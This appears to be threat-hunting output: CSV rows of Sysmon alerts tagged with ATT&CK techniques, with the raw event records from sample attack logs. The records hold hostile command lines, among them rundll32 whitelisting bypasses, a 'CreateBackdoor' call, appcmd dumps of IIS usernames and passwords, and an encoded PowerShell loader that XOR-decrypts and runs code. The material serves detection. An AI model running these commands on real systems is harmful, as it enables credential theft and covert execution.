+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab})",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 12:17:14.447 + 747F3D96-FBCA-5D53-0000-0010B8664100 + 2476 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-F41E-5D53-0000-001067C80300 + 4824 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 417079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 11:43:36.303 + 747F3D96-D8E8-5F8A-0000-00102CEF7200 + 840 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" + C:\Users\IEUser\AppData\Roaming\ + MSEDGEWIN10\IEUser + 747F3D96-CA8D-5F8A-0000-0020D1090A00 + 0xa09d1 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-D8E5-5F8A-0000-0010E1BC7200 + 2920 + C:\Users\IEUser\AppData\Roaming\WINWORD.exe + C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 12:17:14.447 + 747F3D96-FBCA-5D53-0000-0010B8664100 + 2476 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-F41E-5D53-0000-001067C80300 + 4824 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.233522,2019-05-27T05:29:19.233522+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5952 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.183 + 365ABB72-3D6F-5CEB-0000-001026B9FF00 + 1036 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Filename: redirection.config" /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6188 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.428 + 365ABB72-FE76-5CEB-0000-0010546E0C00 + 2356 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 417079 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 11:43:36.303 + 747F3D96-D8E8-5F8A-0000-00102CEF7200 + 840 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" + C:\Users\IEUser\AppData\Roaming\ + MSEDGEWIN10\IEUser + 747F3D96-CA8D-5F8A-0000-0020D1090A00 + 0xa09d1 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-D8E5-5F8A-0000-0010E1BC7200 + 2920 + C:\Users\IEUser\AppData\Roaming\WINWORD.exe + C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 10674 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-14 12:17:14.447 + 747F3D96-FBCA-5D53-0000-0010B8664100 + 2476 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-F419-5D53-0000-002026910200 + 0x29126 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-F41E-5D53-0000-001067C80300 + 4824 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557680510.781015,2019-05-12T21:01:50.781015+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16496 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:01:31.380 + 365ABB72-516B-5CD8-0000-001087E41600 + 3788 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-502E-5CD8-0000-00102A330700 + 3192 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6188 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.428 + 365ABB72-FE76-5CEB-0000-0010546E0C00 + 2356 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1223] Compiled HTML File,1564126754.409237,2019-07-26T11:39:14.409237+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\hh.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4348 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-26 07:39:14.345 + 747F3D96-AE22-5D3A-0000-001096B24E00 + 1504 + C:\Windows\hh.exe + 10.0.17763.1 (WinBuild.160101.0800) + Microsoft® HTML Help Executable + HTML Help + Microsoft Corporation + "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-ABD5-5D3A-0000-0020EB990F00 + 0xf99eb + 1 + Medium + SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C + 747F3D96-ABD7-5D3A-0000-001012661000 + 4940 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243534 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.993 + 747F3D96-9F68-5E75-0000-0010B9662000 + 7420 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243534 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.993 + 747F3D96-9F68-5E75-0000-0010B9662000 + 7420 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243534 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:24.993 + 747F3D96-9F68-5E75-0000-0010B9662000 + 7420 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920559.143393,2019-05-27T05:29:19.143393+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5949 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:19.103 + 365ABB72-3D6F-5CEB-0000-001066B5FF00 + 2796 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0